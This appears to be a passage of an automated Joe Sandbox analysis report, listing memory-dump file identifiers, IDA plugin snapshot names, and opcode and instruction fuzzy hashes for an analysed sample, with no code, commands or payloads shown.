                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d868029b21e681885c26130f662e68370ecc383e913ab36e15cdb3c60a47b4a5
                                                                                                                                                                                                              • Instruction ID: 34c8bcb6d02924d1293d68b2a6f14eadc3b5904487e8255e3abda5fafed22e75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d868029b21e681885c26130f662e68370ecc383e913ab36e15cdb3c60a47b4a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F2106B3E082558FF3445974CC643727BA1EB52310F1B417ECB898B2C2EA7E58099785
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ec977287ec71f874cbffdb03001ba8b7f330b525d2155dfff55e50fa5b4ea3ae
                                                                                                                                                                                                              • Instruction ID: ee28861f5da72686ff0dcd0dbeb49a8ff98807d2554f658def81a27ea62ce5a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec977287ec71f874cbffdb03001ba8b7f330b525d2155dfff55e50fa5b4ea3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D217CF3F2152507F3584839CC69366268297A4325F3F427A8F6EA77C1ECBE5C060284
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a080afd7fb345b39dfb645678c2d384ce2efce75f279c23a4fc92c9b7b3d16aa
                                                                                                                                                                                                              • Instruction ID: f8cf85a67c40c8bfb7feba542b4a00641b368b03d813c9c4665da5cee58b9a81
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a080afd7fb345b39dfb645678c2d384ce2efce75f279c23a4fc92c9b7b3d16aa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F216DB3F5192447F3984874CCAA3626282EB95310F2B81798F59AB3C5DD7E5C094780
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ec60e2ede5a21ad5ca68f8088533a884e94b56726f43cc3d93ea0aeacfbb1d30
                                                                                                                                                                                                              • Instruction ID: 945b77cc70c64c52586b91f806afcc3132e6db6789904b3eec7811c927022d0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec60e2ede5a21ad5ca68f8088533a884e94b56726f43cc3d93ea0aeacfbb1d30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E0171F3F004214BF3688865CC593726143DBD5311F2FC1788B095BBD8D93D1C06A284
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f05de3d4f32d3225e1da777818dcd639c33e1333801d6682efa8fb1a2fe67d11
                                                                                                                                                                                                              • Instruction ID: 792ea622601c4e33141a07c9f54fb183e879215aa5caa7a39482fcb270cab409
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f05de3d4f32d3225e1da777818dcd639c33e1333801d6682efa8fb1a2fe67d11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF0E9F3A085448FE7899F19995157DBBE2A7E0310F27492ED8D603245EA750406C642